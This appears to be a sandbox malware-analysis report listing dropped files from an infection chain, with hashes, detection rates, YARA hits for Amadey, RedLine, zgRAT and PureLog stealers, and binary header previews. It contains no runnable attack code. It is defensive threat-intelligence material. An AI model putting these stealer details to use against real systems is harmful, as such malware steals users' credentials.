                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):392048
                                                                          Entropy (8bit):6.542831007177094
                                                                          Encrypted:false
                                                                          SSDEEP:6144:1eIwnft+S34NVSTjMFR+oVbKQfbno1/1oz6i2EDSD4I+XdtQXGMiFcoOjAWcIhbl:1eIwnft+S34NVSTQD+oVbKQfrC/1ct25
                                                                          MD5:EE856A00410ECED8CC609936D01F954E
                                                                          SHA1:705D378626AEC86FECFDF04C86244006BC3AF431
                                                                          SHA-256:B6192300D3C1476EF3C25A368D055AA401035E78F9F6DBE5F93C84D36EF1FA62
                                                                          SHA-512:666D731247DAEAE4B57925DFA8CAE845327FD34E0F6B9AAD1BCF471D1800D7E8AF5642A5FB6E0EC58BA3AC7DD98A6D3FE0B473F34C16FFB9985621C98C0463EF
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.v[N.%[N.%[N.%4*.$QN.%4*.$.N.%4*.$IN.%4*.$YN.%.*.$HN.%.*.$GN.%.*.$KN.%.*.$XN.%[N.%.O.%.*.$iN.%.*.$ZN.%.*e%ZN.%.*.$ZN.%Rich[N.%........PE..L...D.r^...........!.....8..........^7.......P......................................'.....@..........................6..<)..L_..<.......X...............p3.......3..@,..............................`,..@............P...............................text....7.......8.................. ..`.rdata..l....P.......<..............@..@.data....?...p...6...X..............@....rsrc...X...........................@..@.reloc...3.......4..................@..B................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):720033
                                                                          Entropy (8bit):6.5224294039958215
                                                                          Encrypted:false
                                                                          SSDEEP:12288:sQCCh1TaLSSKrPD37zzH2A6QGgx/nstpq9KgER19zrNidbQgUHayxyF9:sQPh1eLSSKrPD37zzH2A6QD/srqggEQt
                                                                          MD5:D7DF6F3C984025773E86963D3BD54305
                                                                          SHA1:ED78EC29B1A74B80BCCB21E296E70BAABD37DAFE
                                                                          SHA-256:48A0C0ACEF73CA11C8138FF23862423D6DFA6434A8B230AEFFD2D7F1569C98AB
                                                                          SHA-512:97436165F979E80A8DF6D80832CD7C5777D28A01E7F8FA8AD055FB739311E17298DF5BE5827EE717D39B355D7E3A5205483551150E31ED6A5B6AA9BD6432505F
                                                                          Malicious:true
                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................%........................................................... ......................................................CODE............................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..H....0......................@..P.rsrc...............................@..P.....................\..............@..P........................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:InnoSetup Log Fido Video Recorder, version 0x30, 4549 bytes, 571345\user, "C:\Users\user\AppData\Local\Fido Video Recorder"
                                                                          Category:dropped
                                                                          Size (bytes):4549
                                                                          Entropy (8bit):4.636976792889236
                                                                          Encrypted:false
                                                                          SSDEEP:96:mHgHbejWSl4jgApbSwTg93+eOIhuom4cVSQs0LEIeM6OHWwaru5:mHgHbejWW4jpbSY1HIhuAcVSQ1EIb6Od
                                                                          MD5:5C03E806657A3396A17B7AAE4DC0CBD0
                                                                          SHA1:2FFCFA9CAF004656F0B2FFFF3D7DEF415EB116D2
                                                                          SHA-256:79F5DF5309AEF5CF732547A0278668E41DF604CD75E84946C051D90A55109E3C
                                                                          SHA-512:758B53FFF1311A2323C3FAB44F5AA9F8A8779344D491BA767FA65DA87E651CAF221270053ED2CF479952EE3E42740DD7212DA3FE354AB0A2117774E8AC794F7D
                                                                          Malicious:false
                                                                          Preview:Inno Setup Uninstall Log (b)....................................Fido Video Recorder.............................................................................................................Fido Video Recorder.............................................................................................................0...........%................................................................................................................k..........^y@......R....571345.user1C:\Users\user\AppData\Local\Fido Video Recorder...............1.. .....k......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):720033
                                                                          Entropy (8bit):6.5224294039958215
                                                                          Encrypted:false
                                                                          SSDEEP:12288:sQCCh1TaLSSKrPD37zzH2A6QGgx/nstpq9KgER19zrNidbQgUHayxyF9:sQPh1eLSSKrPD37zzH2A6QD/srqggEQt
                                                                          MD5:D7DF6F3C984025773E86963D3BD54305
                                                                          SHA1:ED78EC29B1A74B80BCCB21E296E70BAABD37DAFE
                                                                          SHA-256:48A0C0ACEF73CA11C8138FF23862423D6DFA6434A8B230AEFFD2D7F1569C98AB
                                                                          SHA-512:97436165F979E80A8DF6D80832CD7C5777D28A01E7F8FA8AD055FB739311E17298DF5BE5827EE717D39B355D7E3A5205483551150E31ED6A5B6AA9BD6432505F
                                                                          Malicious:true
                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................%........................................................... ......................................................CODE............................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..H....0......................@..P.rsrc...............................@..P.....................\..............@..P........................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe
                                                                          File Type:CSV text
                                                                          Category:modified
                                                                          Size (bytes):425
                                                                          Entropy (8bit):5.353683843266035
                                                                          Encrypted:false
                                                                          SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                          MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                          SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                          SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                          SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):3274
                                                                          Entropy (8bit):5.3318368586986695
                                                                          Encrypted:false
                                                                          SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
                                                                          MD5:0B2E58EF6402AD69025B36C36D16B67F
                                                                          SHA1:5ECC642327EF5E6A54B7918A4BD7B46A512BF926
                                                                          SHA-256:4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
                                                                          SHA-512:1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe
                                                                          File Type:CSV text
                                                                          Category:modified
                                                                          Size (bytes):425
                                                                          Entropy (8bit):5.353683843266035
                                                                          Encrypted:false
                                                                          SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                          MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                          SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                          SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                          SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):137
                                                                          Entropy (8bit):5.202653706100432
                                                                          Encrypted:false
                                                                          SSDEEP:3:QHXMKa/xwwUC7WyMLDRJ4LNRLFS9Am12MFuAvOAsyQHxW+uCv:Q3La/xwchM3RJoDLIP12MUAvvR+uCv
                                                                          MD5:8A8F1E8A778DFF107B41EA564681FE7B
                                                                          SHA1:08EFCFDC3E33281B2B107D16B739B72AF4898041
                                                                          SHA-256:D09CDD05DA4E3E875D3D5D66C542404519759ACDA2EFA7C00CA69AA3F6234DE4
                                                                          SHA-512:A372330793E09C661E6BF8B2C293C1AF81DE77972B8B4BA47055F07BE0FCDFE5E507ADBC53903A0CD90C392B36FE4A8A41D3FEA923AD97FA061DBEF65398EDF6
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000002001\gold.exe
                                                                          File Type:CSV text
                                                                          Category:dropped
                                                                          Size (bytes):226
                                                                          Entropy (8bit):5.360398796477698
                                                                          Encrypted:false
                                                                          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                          MD5:3A8957C6382192B71471BD14359D0B12
                                                                          SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                          SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                          SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                          Process:C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):3274
                                                                          Entropy (8bit):5.3318368586986695
                                                                          Encrypted:false
                                                                          SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlq0
                                                                          MD5:0C1110E9B7BBBCB651A0B7568D796468
                                                                          SHA1:7AEE00407EE27655FFF0ADFBC96CF7FAD9610AAA
                                                                          SHA-256:112E21404A85963FB5DF8388F97429D6A46E9D4663435CC86267C563C0951FA2
                                                                          SHA-512:46E37552764B4E61006AB99F8C542D55B2418668B097D3C6647D306604C3D7CA3FAF34F8B4121D94B0E7168295B2ABEB7C21C3B96F37208943537B887BC81590
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):3274
                                                                          Entropy (8bit):5.3318368586986695
                                                                          Encrypted:false
                                                                          SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlq0
                                                                          MD5:0C1110E9B7BBBCB651A0B7568D796468
                                                                          SHA1:7AEE00407EE27655FFF0ADFBC96CF7FAD9610AAA
                                                                          SHA-256:112E21404A85963FB5DF8388F97429D6A46E9D4663435CC86267C563C0951FA2
                                                                          SHA-512:46E37552764B4E61006AB99F8C542D55B2418668B097D3C6647D306604C3D7CA3FAF34F8B4121D94B0E7168295B2ABEB7C21C3B96F37208943537B887BC81590
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000254001\penis.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1119
                                                                          Entropy (8bit):5.345080863654519
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                                          MD5:88593431AEF401417595E7A00FE86E5F
                                                                          SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                                          SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                                          SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):425984
                                                                          Entropy (8bit):6.513416731775012
                                                                          Encrypted:false
                                                                          SSDEEP:12288:ISqMakU3v+GYLWIjD9dSbvBG5u2uQjdQco:jq53v+G4Wwub8Ljaco
                                                                          MD5:F5D7B79EE6B6DA6B50E536030BCC3B59
                                                                          SHA1:751B555A8EEDE96D55395290F60ADC43B28BA5E2
                                                                          SHA-256:2F1AFF28961BA0CE85EA0E35B8936BC387F84F459A4A1D63D964CE79E34B8459
                                                                          SHA-512:532B17CD2A6AC5172B1DDBA1E63EDD51AB53A4527204415241E3A78E8FFEB9728071BDE5AE1EEFABEFD2627F00963F8A5458668CD7B8DF041C8683252FF56B46
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe, Author: Joe Security
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L......f............................E.............@.......................................@.................................D...................................<L......8...............................@............................................text............................... ..`.rdata..8...........................@..@.data...|f... ...4..................@....rsrc................0..............@..@.reloc..<L.......N...2..............@..B........................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):311296
                                                                          Entropy (8bit):5.082545442352462
                                                                          Encrypted:false
                                                                          SSDEEP:3072:Eq6EgY6iArUjOvWUJwPYT8QADFKoRJTA+tJSiK1cZqf7D34leqiOLibBOT:vqY6iULwP/xnRJTAKJ81cZqf7DIvL
                                                                          MD5:58E8B2EB19704C5A59350D4FF92E5AB6
                                                                          SHA1:171FC96DDA05E7D275EC42840746258217D9CAF0
                                                                          SHA-256:07D4B7768E13D79AC5F05F81167B29BB6FBF97828A289D8D11EEC38939846834
                                                                          SHA-512:E7655762C5F2D10EC246D11F82D437A2717AD05BE847B5E0FD055E3241CAACA85430F424055B343E3A44C90D76A0BA07A6913C2208F374F59B61F8AA4477889F
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\newbundle2[1].exe, Author: Joe Security
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 88%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0................. ... ....@.. ....................... ............@.....................................O.... ..............................h................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):419328
                                                                          Entropy (8bit):6.1177703153619465
                                                                          Encrypted:false
                                                                          SSDEEP:6144:hVPD7/k5hjsld/TWx3EY9lwXtaW1G4kM0u0b2KrqBDW:hVPHXM31SC4kVu0rGB6
                                                                          MD5:A21700718C70EC5E787AD373CB72A757
                                                                          SHA1:027554AB5FF3245E7617F3B83D6548BF7919F92E
                                                                          SHA-256:87E639ECC7704CB5E29F1EBB1D8ADE3AE863AAA2505A37B28F2D45121DA500C6
                                                                          SHA-512:EA292A5442D9FE536E650A2BC5142DD3AEF79C66930243897E0E87C57915F0A54E45E03E58DAFFB473F85FE10B963D4670050BFF5AB3F91121D21D463E25659B
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, Author: Joe Security
                                                                          • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, Author: ditekSHen
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 33%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..J...........h... ........@.. ....................................@.................................`h..K.................................................................................... ............... ..H............text....H... ...J.................. ..`.rsrc................L..............@..@.reloc...............d..............@..B.................h......H........[...............................................................*...(....(....*.0...........s........~....%:....&~......&...s....%.....(...+o.....8[....o...............%..F~2...(.....%..G~2...(.....%..H~2...(.....%..e~2...(.....~3...(.......o......8......(......s.......s........~....}....~...........s....(....o....}......{.....I~2...(....o........9......I~2...(.......8C........~2...(....o....:......{....~4...(....8......{....~5...(.........(...........9........o.....
                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1929728
                                                                          Entropy (8bit):7.951250240981363
                                                                          Encrypted:false
                                                                          SSDEEP:49152:8lRNijSZ6fzUmuGLLv7CUBhp2skHe4LpFC/:8bNo7UJGLoHJj
                                                                          MD5:E0828E289DFBD343733236C6CFCEE121
                                                                          SHA1:D55235AAE5323348069AD77A8EDCD77D5E45D2A7
                                                                          SHA-256:C1C76C99FF4C06D6B9E252D52B397A0FA281E1AA1A51555193324DECFC0CBCA8
                                                                          SHA-512:CC1940ED569D48AB671E16B05CD2A34E03485220A25ABDD3F8E4D615717A6EE4465368B929BA18563CDB051A39DF803CEBD545FFAA8B07B6E07FDBF42E1849C4
                                                                          Malicious:true
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................L...........@...........................L......`....@.................................W...k.............................L.............................@.L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...ewzoukzh.`...02..X..................@...eahzsgud......L......L..............@....taggant.0....L.."...P..............@...................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):903168
                                                                          Entropy (8bit):7.997700688704897
                                                                          Encrypted:true
                                                                          SSDEEP:24576:9YroRg0QD2ZDvpSgezC2pSSqb9VAMsGm1ykciQgh75tT:9YroRmgSPC2MSpMsGmGiQg95t
                                                                          MD5:84263AB03B0A0F2B51CC11B93EC49C9F
                                                                          SHA1:E6457EB0E0131BEC70A2FD4D4A943314F0BD28D4
                                                                          SHA-256:7D6E4E01C452DD502361640EE095E2BEE35E3F55FD11EDC9E94C3580D2C132B5
                                                                          SHA-512:DB35A02345B5166077E300524675C523A8B4082FA62FC151C0797141348CAE5E173EEAEC5AD1E95556E048EA6ED34A78B90B1184420557C53CD91F351417EBB2
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 68%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.f................................. ........@.. ....................... ............`.....................................W...................................\................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........................................................................k...(.Q...GQL..q.....Nqr.\.^v.E....<..@=...)!b.=qQ...B.c.....<.q.i. A.QE,T..~f.X3.....~..$.).(8t.........r.c@...i.2.?.-.8..-.....:...'I.`D...?/3?...WP.'...XLz....b.| 2....*...\........B....Hg$3p.|+s..K....Z.m.`....w..w.i.Vt..n.LL...d.`a.O..T.......#k.0D@d..8p.{.?Z..-..\W...,.(..P..&`L..?Z..J,y.:...9rY..........D;S.;..3..{..c...,Q........+bN.U.../E..O[....[..W...=..r..x.'...q.S".y.
                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):360448
                                                                          Entropy (8bit):6.667690093536603
                                                                          Encrypted:false
                                                                          SSDEEP:6144:yEIbJdhhk012D9kEsrwRdvwoShfvM4MH0RoeAcGho33vXvIKgI5TdFaA51TIrxLD:yEIbJvhk0azddWtyA51C09ssEN8mhGfp
                                                                          MD5:2F1D09F64218FFFE7243A8B44345B27E
                                                                          SHA1:72553E1B3A759C17F54E7B568F39B3F8F1B1CDBE
                                                                          SHA-256:4A553C39728410EB0EBD5E530FC47EF1BDF4B11848A69889E8301974FC26CDE2
                                                                          SHA-512:5871E2925CA8375F3C3CE368C05EB67796E1FBEC80649D3CC9C39B57EE33F46476D38D3EA8335E2F5518C79F27411A568209F9F6EF38A56650C7436BBAA3F909
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...<..f..........................................@..........................@............@.....................................x................................H...................................................................................text.............................. ..`.rdata...).......*..................@..@.data...X........^..................@....reloc...H.......J...6..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):685392
                                                                          Entropy (8bit):6.872871740790978
                                                                          Encrypted:false
